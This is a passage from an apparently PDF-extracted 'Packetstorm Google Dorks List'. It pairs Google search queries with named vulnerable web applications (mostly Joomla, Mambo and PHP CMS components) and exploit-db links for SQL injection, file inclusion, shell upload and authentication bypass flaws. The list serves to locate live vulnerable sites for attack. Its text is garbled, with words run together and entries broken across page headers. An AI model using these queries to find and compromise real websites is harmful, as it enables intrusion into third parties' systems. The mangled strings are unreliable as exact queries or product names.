"by in-link" or "Powered by In-Link2."

In-link 2.3.4 (ADODB_DIR) RemoteFile Include Vulnerabilities:http://www.exploit-db.com/exploits/2295

inurl:trr.php?id= inurl:trr.php?id=

Ad Board (id) Remote SQL InjectionVulnerability - CVE: 2008-3725:http://www.exploit-db.com/exploits/6271

inurl:"kroax.php?category" inurl:"kroax.php?category"

PHP-Fusion Mod Kroax 4.42(category) SQL Injection Vulnerability- CVE: 2008-5196: http://www.exploit-db.com/exploits/5942

"Powered byReciprocal LinksManager"

"Powered by Reciprocal LinksManager"

Reciprocal Links Manager 1.1 (site)SQL Injection Vulnerability - CVE:2008-4086: http://www.exploit-db.com/exploits/6349

allintext:"LatestPictures" NameGender ProfileRating

allintext:"Latest Pictures" NameGender Profile Rating

Pictures Rating (index.php msgid)Remote SQL Injection Vulnerbility -CVE: 2007-3881: http://www.exploit-db.com/exploits/4191

Page 347: Packetstorm Google Dorks List

intext:"Poweredby eDocStore" intext:"Powered by eDocStore"

eDocStore (doc.php doc_id) RemoteSQL Injection Vulnerability - CVE:2007-3452: http://www.exploit-db.com/exploits/4108

Powered byAM4SS 1.0 Powered by AM4SS 1.0

Advneced Management For ServicesSites (File Disclosure) Vulnerabilities:http://www.exploit-db.com/exploits/12859

"Powered byAlstraSoft SendItPro"

"Powered by AlstraSoft SendIt Pro"

AlstraSoft SendIt Pro Remote FileUpload Vulnerability - CVE: 2008-6932: http://www.exploit-db.com/exploits/7101

inurl:com_content inurl:com_content

Joomla Component com_content 1.0.0(ItemID) SQL Injection Vuln - CVE:2008-6923: http://www.exploit-db.com/exploits/6025

inurl:"noticias.php?notiId=" inurl:"noticias.php?notiId="

Ele Medios CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10418

inurl:"index.php?option=com_huruhelpdesk"

inurl:"index.php?option=com_huruhelpdesk"

Joomla Component(com_huruhelpdesk) SQL InjectionVulnerability - CVE: 2010-2907:http://www.exploit-db.com/exploits/14449

Powered byArticle Directory Powered by Article Directory

Authenication Bypass Vulnerability inArticles Directory: http://www.exploit-db.com/exploits/12445

"Copyright 2005AffiliateDirectory"

"Copyright 2005 AffiliateDirectory"

SFS Affiliate Directory (id) SQLInjection Vulnerability - CVE: 2008-3719: http://www.exploit-db.com/exploits/6270

inurl:"index.php?option=com_bookjoomlas"

inurl:"index.php?option=com_bookjoomlas"

Joomla Component com_bookjoomlas0.1 SQL Injection Vulnerability - CVE:2009-1263: http://www.exploit-db.com/exploits/8353

DevMassShopping Cart DevMass Shopping Cart

DevMass Shopping Cart 1.0 RemoteFile Include Vulnerability - CVE:2007-6133: http://www.exploit-db.com/exploits/4642

inurl:index.php?option=com_allhotels

inurl:index.php?option=com_allhotels

Joomla Component com_allhotels (id)Blind SQL Injection Vulnerability -CVE: 2008-5874: http://www.exploit-db.com/exploits/7568

Page 348: Packetstorm Google Dorks List

"powered byaflog" "powered by aflog"

aflog 1.01 Multiple Insecure CookieHandling Vulnerabilies - CVE: 2008-4784: http://www.exploit-db.com/exploits/6818

inurl:"index.php?option=com_simplefaq"

inurl:"index.php?option=com_simplefaq"

Mambo Component SimpleFAQ 2.11Remote SQL Injection Vulnerability -CVE: 2007-4456: http://www.exploit-db.com/exploits/4296

inurl:couponsite/index.php?page= inurl:couponsite/index.php?page=

Coupon Script 4.0 (id) Remote SQLInjection Vulnerability - CVE: 2008-4090: http://www.exploit-db.com/exploits/6348

inurl:"directory.php?ax=list" gaming

inurl:"directory.php?ax=list"gaming

Gaming Directory 1.0 (cat_id) RemoteSQL Injection Vulnerability:http://www.exploit-db.com/exploits/5374

"script by RECIPESCRIPT" "script by RECIPE SCRIPT"

The Recipe Script 5 Remote XSSVulnerability: http://www.exploit-db.com/exploits/8967

inurl:"index.php?option=com_jobline"

inurl:"index.php?option=com_jobline"

Joomla Component Jobline 1.3.1 BlindSQL Injection Vulnerability - CVE:2009-2554: http://www.exploit-db.com/exploits/9187

Dosya YukleScrtipi v1.0 Dosya Yukle Scrtipi v1.0

Dosya Yukle Scrtipi v1.0 Shell UploadVulnerability: http://www.exploit-db.com/exploits/11620

allinurl: modules-php-op-modload"req view_cat"

allinurl: modules-php-op-modload"req view_cat"

PHP-Nuke Module books SQL (cid)Remote SQL Injection Vulnerability -CVE: 2008-0827: http://www.exploit-db.com/exploits/5147

"Powered byAbsolute FileSend"

"Powered by Absolute File Send"

Absolute File Send 1.0 Remote CookieHandling Vulnerability:http://www.exploit-db.com/exploits/6881

inurl:wapmain.php?option= inurl:wapmain.php?option=

Joomla Component Wap4Joomla(wapmain.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12440

allinurl:"com_na_content" allinurl:"com_na_content"

Mambo Component Sermon 0.2 (gid)SQL Injection Vulnerability - CVE:2008-0721: http://www.exploit-db.com/exploits/5076

Page 349: Packetstorm Google Dorks List

inurl:"com_jcalpro" inurl:"com_jcalpro"

Joomla Component com_jcalpro1.5.3.6 Remote File Inclusion - CVE:2009-4431: http://www.exploit-db.com/exploits/10587

Powered by Webiz Powered by Webiz(Webiz) local SHELL UploadVulnerability: http://www.exploit-db.com/exploits/12797

inurl:category.php?cate_id= inurl:category.php?cate_id=

GC Auction Platinum (cate_id) RemoteSQL Injection Vulnerability - CVE:2008-3413: http://www.exploit-db.com/exploits/6144

CaLogic CalendarsV1.2.2 CaLogic Calendars V1.2.2

CaLogic Calendars 1.2.2 (CLPath)Remote File Include Vulnerabilities -CVE: 2006-2570: http://www.exploit-db.com/exploits/1809

Copyright 2008Free Image & FileHosting

Copyright 2008 Free Image & FileHosting

Free Image & File Hosting UploadVulnerability: http://www.exploit-db.com/exploits/12105

"Powered by RockBand CMS 0.10"

"Powered by Rock Band CMS0.10"

BandCMS 0.10 news.php MultipleSQL Injection Vulnerabilities - CVE:2009-3252: http://www.exploit-db.com/exploits/9553

Copyright Acme2008 Copyright Acme 2008

AJ HYIP ACME (news.php id)Remote SQL Injection Vulnerability -CVE: 2008-2893: http://www.exploit-db.com/exploits/5890

"Send amazinggreetings to yourfriends andrelative!"

"Send amazing greetings to yourfriends and relative!"

Greeting card SQL InjectionVulnerability: http://www.exploit-db.com/exploits/13983

"CreativeGuestbook" "Creative Guestbook"

Creative Guestbook 1.0 MultipleRemote Vulnerabilities - CVE: 2007-1479: http://www.exploit-db.com/exploits/3489

"DeeEmm CMS" "DeeEmm CMS"

DeeEmm CMS (DMCMS) 0.7.4Multiple Remote Vulnerabilities -CVE: 2008-3721: http://www.exploit-db.com/exploits/6250

powered byvBulletin 4.0.4 powered by vBulletin 4.0.4

VBbuletin 4.0.4 MultipleVulnerabilities: http://www.exploit-db.com/exploits/14686

"Vivid Ads "Vivid Ads Shopping Cart" Vivid Ads Shopping Cart (prodid)

Page 350: Packetstorm Google Dorks List

Shopping Cart" Remote SQL Injection:http://www.exploit-db.com/exploits/10297

inurl:"/rbfminc/" inurl:"/rbfminc/"RogioBiz_PHP_file_manager_V1.2bypass admin: http://www.exploit-db.com/exploits/11731

intext:Powered byAWCM v2.1 intext:Powered by AWCM v2.1

AWCM 2.1 Local File Inclusion / AuthBypass Vulnerabilities - CVE: 2009-3219: http://www.exploit-db.com/exploits/9237

inurl:"lista_articulos.php?id_categoria="

inurl:"lista_articulos.php?id_categoria="

SitioOnline SQL InjectionVulnerability: http://www.exploit-db.com/exploits/10453

"Powered ByAlstraSoft AskMePro"

"Powered By AlstraSoft AskMePro"

AlstraSoft AskMe Pro 2.1 MultipleSQL Injection Vulnerabilities - CVE:2008-2902: http://www.exploit-db.com/exploits/5821

allinurl:"com_neogallery" allinurl:"com_neogallery"

Joomla Component NeoGallery 1.1SQL Injection Vulnerability - CVE:2008-0752: http://www.exploit-db.com/exploits/5083

inurl:"com_category" inurl:"com_category"

Joomla Component com_category(catid) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/9126

"Powered ByZoopeer" "Powered By Zoopeer"

Zoopeer 0.1 & 0.2 (fckeditor) ShellUpload Vulnerability:http://www.exploit-db.com/exploits/15354

inurl:index.php?ortupg= inurl:index.php?ortupg=

CMS Ortus 1.13 Remote SQL InjectionVulnerability - CVE: 2008-6282:http://www.exploit-db.com/exploits/7237

inurl:com_jomtube inurl:com_jomtube

Joomla Component com_jomtube(user_id) Blind SQL Injection / SQLInjection: http://www.exploit-db.com/exploits/14434

"Powered by webdirectory script" "Powered by web directory script"

Web Directory Script 1.5.3 (site) SQLInjection Vulnerability - CVE: 2008-4091: http://www.exploit-db.com/exploits/6335

inurl:com_gigcal inurl:com_gigcal Joomla Component com_gigcal

Page 351: Packetstorm Google Dorks List

(gigcal_gigs_id) SQL Injection Vuln -CVE: 2009-0726: http://www.exploit-db.com/exploits/7746

PoweredMarketSaz Powered MarketSaz

MarketSaz remote file UploadVulnerability: http://www.exploit-db.com/exploits/13927

"PHPWebAdminfor hMailServer"intitle:PHPWebAdmin -site:hmailserver.com

"PHPWebAdmin for hMailServer"intitle:PHPWebAdmin -site:hmailserver.com

hMAilServer 4.4.2 (PHPWebAdmin)File Inclusion Vulnerabilities:http://www.exploit-db.com/exploits/7012

inurl:com_ezautos inurl:com_ezautos

Joomla Component (com_ezautos)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/15085

"Designed &Developed byZeeways.com"

"Designed & Developed byZeeways.com"

zeeproperty 1.0 (Upload/XSS) MultipleRemote Vulnerabilities - CVE: 2008-6915: http://www.exploit-db.com/exploits/7058

inurl:option=com_education_classes

inurl:option=com_education_classes

joomla component education SQLinjection Vulnerability:http://www.exploit-db.com/exploits/12153

allinurl:"lyrics_menu/lyrics_song.php?l_id="

allinurl:"lyrics_menu/lyrics_song.php?l_id="

e107 Plugin lyrics_menu(lyrics_song.php l_id) SQL InjectionVulnerability - CVE: 2008-4906:http://www.exploit-db.com/exploits/6885

infusions/recept/recept.php? infusions/recept/recept.php?

PHP-Fusion Mod recept (kat_id) SQLInjection Vulnerability - CVE: 2008-4527: http://www.exploit-db.com/exploits/6683

Copyright 2010My Hosting. Allrights reserved

Copyright 2010 My Hosting. Allrights reserved

Hosting-php-dynamic (Auth Bypass)Vulnerability: http://www.exploit-db.com/exploits/11968

"Powered Bydiskos" "Powered By diskos"

Diskos CMS Manager (SQL/DB/AuthBypass) Multiple Vulnerabilities -CVE: 2009-4798: http://www.exploit-db.com/exploits/8307

Powered by PHPImage Gallery Powered by PHP Image Gallery

SoftComplex PHP Image Gallery 1.0(Auth Bypass) SQL Injection Vuln -CVE: 2008-6488: http://www.exploit-

Page 352: Packetstorm Google Dorks List

db.com/exploits/7021

Powered By Pligg| Legal: Licenseand Source

Powered By Pligg | Legal: Licenseand Source

Pligg CMS 9.9.0 (story.php id) RemoteSQL Injection Vulnerability - CVE:2008-3366: http://www.exploit-db.com/exploits/6146

inurl:/_blogadata/ inurl:/_blogadata/

Blogator-script 0.95 Change UserPassword Vulnerability - CVE: 2008-6473: http://www.exploit-db.com/exploits/5370

"index.php?option=com_chronocontact" /"com_chronocontact"

"index.php?option=com_chronocontact" / "com_chronocontact"

Joomla Component ChronoForms(com_chronocontact):http://www.exploit-db.com/exploits/12843

inurl:"com_a6mambocredits" inurl:"com_a6mambocredits"

Mambo a6mambocredits Component1.0.0 File Include Vulnerability - CVE:2006-4288: http://www.exploit-db.com/exploits/2207

"index.php?id_menu=" CMScontrol "index.php?id_menu=" CMScontrol

CMScontrol (Content ManagementPortal Solutions) Sql Injection - CVE:2009-3326: http://www.exploit-db.com/exploits/9727

inurl:"com_eventcal" inurl:"com_eventcal"

Joomla eventcal Component 1.6.4com_eventcal Blind SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14187

"and Powered By:Sansak" "and Powered By :Sansak"

WebBoard 2.0 Arbitrary SQLQuestion/Anwser Delete Vulnerability:http://www.exploit-db.com/exploits/6303

inurl:profile.php?mode= inurl:profile.php?mode=

PHPBB MOD [2.0.19] Invitation Only(PassCode Bypass vulnerability):http://www.exploit-db.com/exploits/14440

Powered By SalSaCreations Powered By SalSa Creations

ClipShare Pro 2006-2007 (chid) SQLInjection Vulnerability - CVE: 2008-5489: http://www.exploit-db.com/exploits/7128

inurl:modules.php?op= "pollID" inurl:modules.php?op= "pollID"

MD-Pro 1.083.x Survey Module(pollID) Blind SQL InjectionVulnerability - CVE: 2009-2618:http://www.exploit-db.com/exploits/9021

Page 353: Packetstorm Google Dorks List

"Powered bySazCart" "Powered by SazCart"

SazCart 1.5.1 (prodid) Remote SQLInjection - CVE: 2008-2411:http://www.exploit-db.com/exploits/5576

intext:"Poweredby Max.Blog" intext:"Powered by Max.Blog"

Max.Blog 1.0.6 (offline_auth.php)Offline Authentication Bypass - CVE:2009-0409: http://www.exploit-db.com/exploits/7899

"Powered byCMSimple" "Powered by CMSimple"

CMSimple 3.1 Local File Inclusion /Arbitrary File Upload - CVE: 2008-2650: http://www.exploit-db.com/exploits/5700

inurl:"com_performs" inurl:"com_performs"

perForms Mambo Component 1.0Remote File Inclusion - CVE: 2006-3774: http://www.exploit-db.com/exploits/2025

inurl:"com_mambowiki" inurl:"com_mambowiki"

Mambo MamboWiki Component 0.9.6Remote Include Vulnerability - CVE:2006-4282: http://www.exploit-db.com/exploits/2213

index.asp?archivio=OK index.asp?archivio=OK

Ublog access version ArbitraryDatabase Disclosure:http://www.exploit-db.com/exploits/8610

album.asp?pic=.jpg cat= album.asp?pic= .jpg cat=

aspWebAlbum 3.2 Multiple RemoteVulnerabilities - CVE: 2008-6977:http://www.exploit-db.com/exploits/6420

"Multi-PageComment System" "Multi-Page Comment System"

Multi-Page Comment System 1.1.0Insecure Cookie HandlingVulnerability - CVE: 2008-2293:http://www.exploit-db.com/exploits/5630

inurl:"com_wmtpic" inurl:"com_wmtpic"

Joomla Component com_wmtpic 1.0SQL Injection Vulnerability:http://www.exploit-db.com/exploits/14128

inurl:index.php?mode=game_player inurl:index.php?mode=game_player

Tycoon CMS Record Script SQLInjection Vulnerability - CVE: 2010-3027: http://www.exploit-db.com/exploits/14572

"pages.php?page_ID=" "K9

"pages.php?page_ID=" "K9Kreativity"

K9 Kreativity Design (pages.php) SQLInjection Vulnerability:

Page 354: Packetstorm Google Dorks List

Kreativity" http://www.exploit-db.com/exploits/12866

album.asp?pic=.jpg cat= album.asp?pic= .jpg cat=

aspWebAlbum 3.2 (Upload/SQL/XSS)Multiple Remote Vulnerabilities -CVE: 2008-6977: http://www.exploit-db.com/exploits/6357

inurl:"option=com_simpleshop" &inurl:"viewprod"

inurl:"option=com_simpleshop" &inurl:"viewprod"

Joomla SimpleShop Component(com_simpleshop) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14501

intext:"Poweredby CommunityCMS"

intext:"Powered by CommunityCMS"

Community CMS 0.5 Multiple SQLInjection Vulnerabilities - CVE: 2009-4794: http://www.exploit-db.com/exploits/8323

"Powered byScallywag" "Powered by Scallywag"

Scallywag (template.php path) RemoteFile Inclusion Vulnerabilities - CVE:2007-2900: http://www.exploit-db.com/exploits/3972

inurl:"phshoutbox.php" inurl:"phshoutbox.php"

PhShoutBox 1.5 (final) InsecureCookie Handling Vulnerability - CVE:2008-1971: http://www.exploit-db.com/exploits/5467

"index.php?option=com_seyret" /"com_seyret"

"index.php?option=com_seyret" /"com_seyret"

Joomla Component Seyret(com_seyret) - Local File InclusionVulnerability: http://www.exploit-db.com/exploits/14183

inurl:inc_memberdirectorymanager.asp

inurl:inc_memberdirectorymanager.asp

DMXReady Member DirectoryManager 1.1 SQL InjectionVulnerability - CVE: 2009-0427:http://www.exploit-db.com/exploits/7773

inurl:"mod=notizie" inurl:"mod=notizie"

XCMS 1.83 Remote CommandExecution - CVE: 2007-6652:http://www.exploit-db.com/exploits/4813

"Powered ByScozNews" "Powered By ScozNews"

ScozNews 1.2.1 (mainpath) RemoteFile Inclusion Vulnerability - CVE:2006-2487: http://www.exploit-db.com/exploits/1800

"PHP BP Team" "PHP BP Team"

phpBP RC3 (2.204) FIX4 Remote SQLInjection Vulnerability - CVE: 2008-1408: http://www.exploit-db.com/exploits/5263

Page 355: Packetstorm Google Dorks List

inurl:"picture.php?cat=" "Powered byPhpWebGallery1.3.4"

inurl:"picture.php?cat=" "Poweredby PhpWebGallery 1.3.4"

PhpWebGallery 1.3.4 (XSS/LFI)Multiple Vulnerabilities - CVE: 2008-4591: http://www.exploit-db.com/exploits/6425

inurl:"zcat.php?id=" inurl:"zcat.php?id="

IRAN N.E.T E-commerce Group SQLInjection Vulnerability:http://www.exploit-db.com/exploits/10350

inurl:K-Search,Powered By K-Search

inurl:K-Search, Powered By K-Search

K-Search (SQL/XSS) Multiple RemoteVulnerabilities - CVE: 2010-2457:http://www.exploit-db.com/exploits/13993

"index.php?option=com_chronoconnectivity" /"com_chronoconnectivity"

"index.php?option=com_chronoconnectivity" /"com_chronoconnectivity

Joomla ComponentChronoConnectivity:http://www.exploit-db.com/exploits/12842

Powered by cPCreator v2.7.1 Powered by cP Creator v2.7.1

cP Creator v2.7.1 Remote Sql Injection- CVE: 2009-3330: http://www.exploit-db.com/exploits/9726

inurl:"com_mscomment" inurl:"com_mscomment"

Joomla Component MS Comment LFIVulnerability - CVE: 2010-2050:http://www.exploit-db.com/exploits/12611

Powered by MitraInformatikaSolusindo

Powered by Mitra InformatikaSolusindo

Mitra Informatika Solusindo cartRemote SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5214

"Powered bybSpeak 1.10" "Powered by bSpeak 1.10"

bSpeak 1.10 (forumid) Remote BlindSQL Injection Vulnerability - CVE:2009-1747: http://www.exploit-db.com/exploits/8751

Powered byosCommerce Powered by osCommerce

osCommerce Online Merchant 2.2RC2a Code Execution:http://www.exploit-db.com/exploits/9556

inurl:choosecard.php?catid= inurl:choosecard.php?catid=

post Card ( catid ) Remote SQLInjection Vulnerability:http://www.exploit-db.com/exploits/11892

inurl:"com_jphoto" inurl:"com_jphoto"

Joomla Component com_jphoto SQLInjection Vulnerability - (id) - CVE:2009-4598: http://www.exploit-

Page 356: Packetstorm Google Dorks List

db.com/exploits/10367

allinurl:e107_plugins/easyshop/easyshop.php

allinurl:e107_plugins/easyshop/easyshop.php

e107 Plugin EasyShop (category_id)Blind SQL Injection - CVE: 2008-4786: http://www.exploit-db.com/exploits/6852

inurl:"com_koesubmit" inurl:"com_koesubmit"

Mambo com_koesubmit 1.0.0 RemoteFile Inclusion - CVE: 2009-3333:http://www.exploit-db.com/exploits/9714

Powered by PHPAdvanced TransferManager v1.10 -@2002 BugadaAndrea

Powered by PHP AdvancedTransfer Manager v1.10 - @2002Bugada Andrea

PHP Advanced Transfer Managerv1.10 Shell Upload Vulnerability:http://www.exploit-db.com/exploits/11613

inurl:add_soft.php inurl:add_soft.php

Hotscripts Clone (cid) Remote SQLInjection Vulnerability - CVE: 2008-6405: http://www.exploit-db.com/exploits/6545

"Powered byAbsolute Podcast" "Powered by Absolute Podcast"

Absolute Podcast 1.0 Remote InsecureCookie Handling Vulnerability - CVE:2008-6857: http://www.exploit-db.com/exploits/6882

Powered byiScripts EasyBiller Powered by iScripts EasyBiller

iScripts easybiller v1.1 sqlivulnerability: http://www.exploit-db.com/exploits/13741

"[email protected]"

"[email protected]"

ZEEJOBSITE 2.0 Remote File UploadVulnerability - CVE: 2008-6913:http://www.exploit-db.com/exploits/7062

"Powered ByphpCOIN v1.2.1" /"mod.php?mod=faq"

"Powered By phpCOIN v1.2.1" /"mod.php?mod=faq"

phpCOIN 1.2.1 (mod.php) LFIVulnerability - CVE: 2010-0953:http://www.exploit-db.com/exploits/11641

inurl:"index.php?option=com_jp_jobs"

inurl:"index.php?option=com_jp_jobs"

Joomla component jp_jobs SQLInjection Vulnerability - CVE: 2010-1350: http://www.exploit-db.com/exploits/12037

allinurl:Category.php?IndustrYID=

http://www.google.com/search?source=ig&hl=fr&rlz=&q=allinurl:+Category.php%3FIndustrYID%3D

CmS (id) SQL Injection Vulnerability -CVE: 2009-2439: http://www.exploit-db.com/exploits/12333

index2.php?option=com_joomlaboar

index2.php?option=com_joomlaboard

Joomla Component Joomlaboard 1.1.1(sbp) RFI Vulnerability:

Page 357: Packetstorm Google Dorks List

d http://www.exploit-db.com/exploits/3560

intext:"PoweredBy WorldPay"inurl:productdetail.php

intext:"Powered By WorldPay"inurl:productdetail.php

WorldPay Script Shop (productdetail)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/10976

inurl:"cameralife/index.php" inurl:"cameralife/index.php"

Camera Life 2.6.2b4 (SQL/XSS)Multiple Remote Vulnerabilities -CVE: 2008-6087: http://www.exploit-db.com/exploits/6710

inurl:option=com_huruhelpdesk inurl:option=com_huruhelpdesk

joomla component allvideos BLINDSQL injection Vulnerability:http://www.exploit-db.com/exploits/12137

inurl:inc_membersareamanager.asp inurl:inc_membersareamanager.asp

DMXReady Members Area Manager1.2 SQL Injection Vulnerability:http://www.exploit-db.com/exploits/7774

"Tanyakan PadaRumput YangBergoyang"

"Tanyakan Pada Rumput YangBergoyang"

Moa Gallery 1.2.0 Multiple RemoteFile Inclusion Vulnerabilities - CVE:2009-4614: http://www.exploit-db.com/exploits/9522

inurl:/component/jesectionfinder/ inurl:/component/jesectionfinder/

Joomla Component JE Section FinderLFI Vulnerability - CVE: 2010-2680:http://www.exploit-db.com/exploits/14064

intitle:phpMyAdmin intitle:phpMyAdmin

phpMyAdmin Code Injection RCE -CVE: 2009-1151: http://www.exploit-db.com/exploits/8992

inurl:"com_phocagallery" inurl:"com_phocagallery"

Joomla Phoca Gallery Component(com_phocagallery) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/14207

inurl:"member.php?page=comments"

inurl:"member.php?page=comments"

6ALBlog (newsid) Remote SQLInjection Vulnerability - CVE: 2007-3451: http://www.exploit-db.com/exploits/4104

''webboardquestion.asp QID'' ''webboard question.asp QID''

PORAR WEBBOARD (question.asp)Remote SQL Injection Vulnerability -CVE: 2008-1039: http://www.exploit-db.com/exploits/5185

inurl:"index.php?o inurl:"index.php?option=com_pony Joomla Component Pony Gallery 1.5

Page 358: Packetstorm Google Dorks List

ption=com_ponygallery"

gallery" SQL Injection Vulnerability - CVE:2007-4046: http://www.exploit-db.com/exploits/4201

inurl:"com_dbquery" OR"index.php?option=com_dbquery"

inurl:"com_dbquery" OR"index.php?option=com_dbquery"

Joomla Component DBQuery 1.4.1.1RFI Vulnerability - CVE: 2008-6841:http://www.exploit-db.com/exploits/6003/

"PowerMovieList0.14 BetaCopyright"

"PowerMovieList 0.14 BetaCopyright"

PowerMovieList 0.14b (SQL/XSS)Multiple Remote Vulnerabilities:http://www.exploit-db.com/exploits/8062

"powered byMODx" "powered by MODx"

MODx CMS 0.9.2.1 (FCKeditor)Remote File Include Vulnerability -CVE: 2006-5730: http://www.exploit-db.com/exploits/2706/

"Powered bywords tag script" "Powered by words tag script"

Words tag script 1.2 (word) RemoteSQL Injection Vulnerability - CVE:2008-3945: http://www.exploit-db.com/exploits/6336

"Powered byosCMax v2.0" ,"Copyright @""RahnemaCo.com"

"Powered by osCMax v2.0" ,"Copyright @" "RahnemaCo.com"

osCMax 2.0 (fckeditor) Remote FileUpload: http://www.exploit-db.com/exploits/11771

FrontAccounting FrontAccounting

FrontAccounting 1.12 Build 31 RemoteFile Inclusion Vulnerability - CVE:2007-4279: http://www.exploit-db.com/exploits/4269

Powered byEgorix Powered by Egorix

EPOLL SYSTEM 3.1 (password.dat)Disclosure: http://www.exploit-db.com/exploits/7864

intext:"FreeEcommerceShopping CartSoftware byViArt" +"Yourshopping cart isempty!" +"Products Search"+"AdvancedSearch" + "AllCategories"

intext:"Free Ecommerce ShoppingCart Software by ViArt" +"Yourshopping cart is empty!" +"Products Search" +"AdvancedSearch" + "All Categories"

ViArt Shopping Cart 3.5 MultipleRemote Vulnerabilities - CVE: 2008-6758: http://www.exploit-db.com/exploits/7628

"powered by "powered by WonderEdit Pro" WonderEdit Pro CMS (template_path)

Page 359: Packetstorm Google Dorks List

WonderEdit Pro" Remote File Include Vulnerabilities -CVE: 2006-3422: http://www.exploit-db.com/exploits/1982

inurl:"kgb19" inurl:"kgb19"

KGB 1.9 (sesskglogadmin.php) LocalFile Include - CVE: 2007-0337:http://www.exploit-db.com/exploits/3134

allinurl:buyer/index.php?ProductID=

allinurl:buyer/index.php?ProductID=

Alibaba Clone Platinum(buyer/index.php) SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12609

"powered bySitellite" "powered by Sitellite"

Sitellite CMS 4.2.12 (559668.php)Remote File Inclusion Vulnerability -CVE: 2007-3228: http://www.exploit-db.com/exploits/4071

"Powered byComdev NewsPublisher"

"Powered by Comdev NewsPublisher"

Comdev News Publisher Remote SQLInjection Vulnerability - CVE: 2008-1872: http://www.exploit-db.com/exploits/5362

Powered By: AJSquare Inc Powered By: AJ Square Inc

AJ Article Persistent XSSVulnerability - CVE: 2010-2917:http://www.exploit-db.com/exploits/14354

"index.php?option=com_sef" /"com_sef"

"index.php?option=com_sef" /"com_sef"

Joomla Component Sef (com_sef) -LFI Vulnerability: http://www.exploit-db.com/exploits/14213

inurl:option=com_huruhelpdesk inurl:option=com_huruhelpdesk

joomla component huruhelpdesk SQLinjection Vulnerability:http://www.exploit-db.com/exploits/12124

inurl:inc_securedocumentlibrary.asp

inurl:inc_securedocumentlibrary.asp

DMXReady Secure Document Library1.1 Remote SQL Injection Vuln - CVE:2009-0428: http://www.exploit-db.com/exploits/7787

Powered byDolphin Powered by Dolphin

Dolphin v7.0.3 MultipleVulnerabilities: http://www.exploit-db.com/exploits/15400

inurl:"php/showContent.php?linkid="

inurl:"php/showContent.php?linkid="

Worldviewer.com CMS SQL InjectionVulnerability: http://www.exploit-db.com/exploits/12163

sitou timou tumoutou sitou timou tumou tou Drunken:Golem Gaming Portal

(admin_news_bot.php) RFI

Page 360: Packetstorm Google Dorks List

Vulnerability - CVE: 2009-4622:http://www.exploit-db.com/exploits/9635

inurl:.asp?Powered byComersus ASPShopping Cart

inurl:.asp? Powered by ComersusASP Shopping Cart

Comersus ASP Shopping Cart(DD/XSS) Multiple RemoteVulnerabilities: http://www.exploit-db.com/exploits/7259

inurl:index.php?option=com_lowcosthotels

inurl:index.php?option=com_lowcosthotels

Joomla Component com_lowcosthotels(id) Blind SQL Injection Vuln - CVE:2008-5864: http://www.exploit-db.com/exploits/7567

Vibro-SchoolCMS bynicLOR.net

Vibro-School CMS by nicLOR.net

Vibro-School-CMS (nID) Remote SQLinjection Vulnerability - CVE: 2008-6795: http://www.exploit-db.com/exploits/6981

"Absolute PollManager XE" "Absolute Poll Manager XE"

Absolute Poll Manager XE 4.1 CookieHandling Vulnerability - CVE: 2008-6860: http://www.exploit-db.com/exploits/6883

Copyright 2010.Software Index Copyright 2010. Software Index

PishBini Footbal XSS and SQLInjection Vulnerability:http://www.exploit-db.com/exploits/14000

inurl:"com_linkdirectory" inurl:"com_linkdirectory"

Joomla Link Directory Component1.0.3 Remote Include Vulnerability:http://www.exploit-db.com/exploits/2214

inurl:com_manager inurl:com_manager

Joomla Component com_manager1.5.3 (id) SQL Injection Vulnerability:http://www.exploit-db.com/exploits/12257

"Developed byInfowareSolutions"

"Developed by Infoware Solutions"

My PHP Dating (success_story.php id)SQL Injection Vulnerability - CVE:2008-4705: http://www.exploit-db.com/exploits/6754

"Powered by: YesSolutions" "Powered by: Yes Solutions"

Yes Solutions - Webapp SQLInjection: http://www.exploit-db.com/exploits/11368

allinurl:"verliadmin" allinurl:"verliadmin"

VerliAdmin 0.3 (index.php) RemoteFile Include - CVE: 2006-6666:http://www.exploit-db.com/exploits/2944

Page 361: Packetstorm Google Dorks List

"Powered byUNAK-CMS" "Powered by UNAK-CMS"

UNAK-CMS 1.5 (dirroot) Remote FileInclude Vulnerabilities - CVE: 2006-4890: http://www.exploit-db.com/exploits/2380

inurl:"com_quickfaq" inurl:"com_quickfaq"

Joomla QuickFAQ Component(com_quickfaq) Blind SQL InjectionVulnerability - CVE: 2010-2845:http://www.exploit-db.com/exploits/14296

"Powered byEZCMS" "Powered by EZCMS"

EZCMS 1.2 (bSQL/Admin Byapss)Multiple Remote Vulnerabilities -CVE: 2008-2921: http://www.exploit-db.com/exploits/5819

inurl:index.php?menu=adorder inurl:index.php?menu=adorder

ACG-PTP 1.0.6 (adid) Remote SQLInjection Vulnerability - CVE: 2008-3944: http://www.exploit-db.com/exploits/6362

allinurl:"com_accombo" allinurl:"com_accombo"

Mambo Component accombo 1.x (id)SQL Injection Vulnerability:http://www.exploit-db.com/exploits/5279

"Powered byScratcher" "Powered by Scratcher"

Scratcher (SQL/XSS) Multiple RemoteVulnerability - CVE: 2010-1742:http://www.exploit-db.com/exploits/12458

inurl:/components/je-media-player.html?

inurl:/components/je-media-player.html?

Joomla JE Media Player ComponentLFI Vulnerability: http://www.exploit-db.com/exploits/14060

"Powered byHow2asp" "Powered by How2asp"

How2ASP.net Webboard 4.1 RemoteSQL Injection Vulnerability - CVE:2008-2417: http://www.exploit-db.com/exploits/5638

"Powered byPHPBasket" "Powered by PHPBasket"

PHPBasket (product.php pro_id) SQLInjection Vulnerability - CVE: 2008-3713: http://www.exploit-db.com/exploits/6258

inurl:module=My_eGallery pid inurl:module=My_eGallery pid

MDPro Module My_eGallery (pid)Remote SQL Injection - CVE: 2009-0728: http://www.exploit-db.com/exploits/8100

"Powered byDayfox Designs" "Powered by Dayfox Designs"

Dayfox Blog 4 (postpost.php) RemoteCode Execution Vulnerability - CVE:2007-1525: http://www.exploit-

Page 362: Packetstorm Google Dorks List

db.com/exploits/3478Website poweredby SubdreamerCMS & SequelTheme Designedby indiqo.media

Website powered by SubdreamerCMS & Sequel Theme Designed byindiqo.media

Subdreamer.v3.0.1 cms uploadVulnerability: http://www.exploit-db.com/exploits/11749

"These forums arerunning on""miniBB"

"These forums are running on""miniBB"

